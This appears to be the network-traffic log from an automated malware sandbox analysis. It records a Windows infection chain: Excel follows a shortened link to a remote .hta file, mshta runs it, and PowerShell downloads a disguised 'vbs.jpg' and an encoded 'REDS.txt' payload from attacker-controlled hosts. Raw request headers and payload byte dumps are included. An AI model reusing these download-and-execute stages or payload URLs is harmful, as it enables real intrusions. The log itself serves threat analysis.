                                                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49175 | 192.3.193.155 | 80 | 1960 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:56:50.112591982 CEST | 469 | OUT | GET /xampp/boz/bz/IEnetworkroundthings.hta HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
If-Modified-Since: Wed, 28 Aug 2024 01:17:45 GMT
Connection: Keep-Alive
Host: 192.3.193.155
If-None-Match: "1ccb3-620b4202337ba"
Aug 28, 2024 06:56:50.218367100 CEST | 276 | IN | HTTP/1.1 304 Not Modified
Date: Wed, 28 Aug 2024 04:56:50 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Wed, 28 Aug 2024 01:17:45 GMT
ETag: "1ccb3-620b4202337ba"
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49177 | 192.3.193.155 | 80 | 4016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:57:03.082536936 CEST | 81 | OUT | GET /xampp/boz/REDS.txt HTTP/1.1
Host: 192.3.193.155
Connection: Keep-Alive
Aug 28, 2024 06:57:03.553361893 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 04:57:03 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Wed, 28 Aug 2024 01:12:17 GMT
ETag: "a1000-620b40c95ea2b"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
Aug 28, 2024 06:57:03.553390026 CEST | 1236 | IN | Data Raw: 34 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67
                                                      Data Ascii: 4gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQ
Aug 28, 2024 06:57:03.553401947 CEST | 1236 | IN | Data Raw: 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74
                                                      Data Ascii: kxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmD
Aug 28, 2024 06:57:03.553415060 CEST | 1236 | IN | Data Raw: 37 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67
                                                      Data Ascii: 7wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6Qm
Aug 28, 2024 06:57:03.553427935 CEST | 896 | IN | Data Raw: 6b 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75
                                                      Data Ascii: kyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnD
                                                      Aug 28, 2024 06:57:03.553440094 CEST | 1236 | IN | Data Raw: 6b 59 44 49 32 77 68 4e 59 59 44 46 32 41 68 4e 4d 59 44 41 31 77 66 4e 34 58 44 39 31 41 66 4e 73 58 44 36 31 51 65 4e 67 58 44 33 31 67 64 4e 55 58 44 30 31 77 63 4e 49 58 44 78 31 41 63 4e 38 57 44 75 31 51 62 4e 77 57 44 72 31 67 61 4e 6b 57
                                                      Data Ascii: kYDI2whNYYDF2AhNMYDA1wfN4XD91AfNsXD61QeNgXD31gdNUXD01wcNIXDx1AcN8WDu1QbNwWDr1gaNkWDo1wZNYWDl1AZNMWDi1QYNAWDf1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDAAAQAsBQBQCQMsHj4xgdMOHDxxobMwGjpxwZMSGDix4XM0FjaxAWMWFD
                                                      Aug 28, 2024 06:57:03.553452015 CEST | 1236 | IN | Data Raw: 31 41 65 4e 4f 58 44 76 31 6f 61 4e 59 57 44 56 31 41 45 4e 77 54 54 36 30 34 4b 4e 59 53 6a 5a 30 6f 46 4e 72 51 6a 48 7a 41 2b 4d 2f 4f 54 74 7a 49 36 4d 34 4e 7a 62 7a 67 32 4d 6d 4d 7a 48 79 55 75 4d 50 4c 44 75 79 45 72 4d 49 4b 44 67 79 4d
                                                      Data Ascii: 1AeNOXDv1oaNYWDV1AENwTT604KNYSjZ0oFNrQjHzA+M/OTtzI6M4Nzbzg2MmMzHyUuMPLDuyErMIKDgyMmMVJjRyYQMsDAAAgHAFAAAAAwPU/jp/k3Pn9zT/YkPJ7jA9sePe3T09QcPD2jd98WPo1TY8QOPZzzu8QJPyxzR8MxOvvD47Y9OPrj864JO4jjk3Q9NGfzs3s6NdejV3k0N1czI2srNZVDo1gZNKWTe1wWNhVTI1wA
                                                      Aug 28, 2024 06:57:03.553463936 CEST | 1236 | IN | Data Raw: 54 53 44 6a 30 73 48 4e 78 52 7a 5a 30 41 47 4e 52 52 7a 53 30 51 45 4e 35 49 54 76 79 49 72 4d 53 46 6a 2b 78 51 66 4d 75 48 7a 32 78 30 63 4d 46 48 6a 72 78 51 61 4d 5a 47 7a 6b 78 34 59 4d 70 46 44 59 78 77 54 4d 30 41 54 39 77 30 4f 4d 73 43
                                                      Data Ascii: TSDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm/44P89Dd/g2Pg9zV/40PG9jP/YzPu8TI/UxPN4zz+MqP35DU+okPE5jP+YjPy4zJ+ghPM0z+98ePd3Tu9oaPc2je9UXPw1DX9EVP80zL9QCP1zz18INPNzj
                                                      Aug 28, 2024 06:57:03.553477049 CEST | 1236 | IN | Data Raw: 31 34 59 4e 6a 55 54 48 31 63 52 4e 4e 51 54 75 30 55 4b 4e 66 53 54 6a 30 30 45 4e 79 51 44 49 30 38 41 4e 47 4d 44 2f 7a 51 2f 4d 69 50 6a 6d 7a 45 35 4d 2f 4e 44 65 7a 34 67 4d 39 4c 44 2b 79 77 75 4d 6e 4c 44 31 79 67 73 4d 42 4c 6a 71 79 51
                                                      Data Ascii: 14YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISNYXzw1kWNWQTCzsyMIID2xcMAAAATAQAIAszY4UxN4fjp3Ak
                                                      Aug 28, 2024 06:57:03.553489923 CEST | 1236 | IN | Data Raw: 73 79 44 71 38 51 4b 50 67 79 7a 6d 38 59 46 50 41 73 44 2f 37 67 2f 4f 30 76 7a 37 37 67 2b 4f 78 71 7a 41 35 55 66 4f 58 6e 44 78 33 77 79 4e 6f 63 44 4a 33 41 79 4e 62 59 6a 31 32 41 6f 4e 38 5a 44 65 32 51 6e 4e 76 5a 44 61 32 45 44 4e 44 53
                                                      Data Ascii: syDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDfyYnMxJzayUmMfJjWyQlMOJDSyMkM9IzNyEjMsIjJyAiMaITFy8gMJIzAx4fM4Hj8xweMnHT4xsdMVHD0xocMEHjvxkbMzGTrxcaMiGDnxYZMQGzixUYM/FT
                                                      Aug 28, 2024 06:57:03.558514118 CEST | 1236 | IN | Data Raw: 7a 4d 33 4d 73 4e 54 58 7a 63 31 4d 4b 4a 44 64 79 6f 6d 4d 67 4a 6a 56 79 77 6b 4d 47 42 41 41 42 51 42 41 44 41 45 41 2f 77 68 50 31 31 6a 32 39 6b 44 50 6d 79 7a 45 37 41 6f 4f 76 6e 44 42 34 49 50 4f 63 6a 54 70 34 63 49 4f 73 68 44 53 34 45
                                                      Data Ascii: zM3MsNTXzc1MKJDdyomMgJjVywkMGBAABQBADAEA/whP11j29kDPmyzE7AoOvnDB4IPOcjTp4cIOshDS4EDOUgDDAAAAsAwAwAwPA+za/YlP+TjNzcOAAAAFAMAIAMTEzEAAAAADAMAEA8jJ/AhP67TvAAAAQAwAAAAAAETTx4TMtEzDxAAAAAAFAIA8AAAA4kHOYhjR4cDORAAAAQBACANA0QDNHAAAAwAACAMA7M8O3uTm7Q3


                                                      Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
                                                      0          | 192.168.2.22 | 49163       | 88.99.66.38    | 443              | 3528 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Timestamp               | Bytes transferred | Direction | Data
                                                      2024-08-28 04:56:27 UTC | 321               | OUT       | GET /pitash HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: zhort.de
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:27 UTC | 469               | IN        | HTTP/1.1 302 Found
                                                      Server: openresty
                                                      Date: Wed, 28 Aug 2024 04:56:27 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 80
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
                                                      Vary: Accept
                                                      X-Served-By: zhort.de
                                                      2024-08-28 04:56:27 UTC | 80                | IN        | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 39 33 2e 31 35 35 2f 78 61 6d 70 70 2f 62 6f 7a 2f 62 7a 2f 49 45 6e 65 74 77 6f 72 6b 72 6f 75 6e 64 74 68 69 6e 67 73 2e 68 74 61
                                                      Data Ascii: Found. Redirecting to http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta


                                                      Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
                                                      1          | 192.168.2.22 | 49165       | 88.99.66.38    | 443              | 3776 | C:\Windows\System32\mshta.exe
                                                      Timestamp               | Bytes transferred | Direction | Data
                                                      2024-08-28 04:56:29 UTC | 345               | OUT       | GET /pitash HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: zhort.de
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:29 UTC | 469               | IN        | HTTP/1.1 302 Found
                                                      Server: openresty
                                                      Date: Wed, 28 Aug 2024 04:56:29 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 80
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
                                                      Vary: Accept
                                                      X-Served-By: zhort.de
                                                      2024-08-28 04:56:29 UTC | 80                | IN        | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 31 39 33 2e 31 35 35 2f 78 61 6d 70 70 2f 62 6f 7a 2f 62 7a 2f 49 45 6e 65 74 77 6f 72 6b 72 6f 75 6e 64 74 68 69 6e 67 73 2e 68 74 61
                                                      Data Ascii: Found. Redirecting to http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta


                                                      Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
                                                      2          | 192.168.2.22 | 49168       | 207.241.232.154 | 443              | 2848 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Timestamp               | Bytes transferred | Direction | Data
                                                      2024-08-28 04:56:42 UTC | 111               | OUT       | GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                      Host: ia803104.us.archive.org
                                                      Connection: Keep-Alive
                                                      2024-08-28 04:56:42 UTC | 591               | IN        | HTTP/1.1 200 OK
                                                      Server: nginx/1.24.0 (Ubuntu)
                                                      Date: Wed, 28 Aug 2024 04:56:42 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 1931225
                                                      Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                      Connection: close
                                                      ETag: "66a41ab4-1d77d9"
                                                      Strict-Transport-Security: max-age=15724800
                                                      Expires: Wed, 28 Aug 2024 10:56:42 GMT
                                                      Cache-Control: max-age=21600
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                      Access-Control-Allow-Credentials: true
                                                      Accept-Ranges: bytes
                                                      2024-08-28 04:56:42 UTC | 15793             | IN        | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                      2024-08-28 04:56:42 UTC | 16384             | IN        | Data Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                      Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                      2024-08-28 04:56:42 UTC | 16384             | IN        | Data Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                      Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                      2024-08-28 04:56:42 UTC | 16384             | IN        | Data Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                      Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                      2024-08-28 04:56:42 UTC | 16384             | IN        | Data Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                      Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                      2024-08-28 04:56:42 UTC | 16384             | IN        | Data Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                      Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                      2024-08-28 04:56:42 UTC | 16384             | IN        | Data Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                      Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
